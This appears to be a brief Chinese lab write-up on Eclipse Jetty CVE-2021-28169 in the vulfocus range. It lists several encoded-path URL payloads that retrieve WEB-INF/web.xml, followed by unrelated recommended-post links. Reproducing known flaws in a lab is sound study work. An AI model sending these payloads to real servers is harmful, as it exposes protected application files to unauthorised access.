vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload:

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问:

对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml

相关推荐
大袤宏图7 天前
框架为我们做了什么?
tomcat·jetty
平凡之路无尽路12 天前
二、反应式集成-spring
java·jvm·后端·spring cloud·aigc·ai编程·jetty
语义直下24 天前
实用软件下载:MathType最新安装包及详细安装教程
spring·java-ee·jetty
兰色の幻想1 个月前
EarMaster Pro软件下载附加详细安装教程
spring·junit·java-ee·jetty
Hacoj2 个月前
SpringBoot集成WebService
java·spring boot·后端·java-ee·jetty
渔家^3 个月前
代理与反向代理
java·nginx·jetty
Artisan_w3 个月前
Netty的基本架构与组件
java·网络·架构·jetty
小南家的青蛙4 个月前
Jetty的http模块
java·http·jetty
.生产的驴5 个月前
SpringBoot 事务管理Transactional 数据回滚 数据一致性
java·开发语言·spring boot·后端·spring·maven·jetty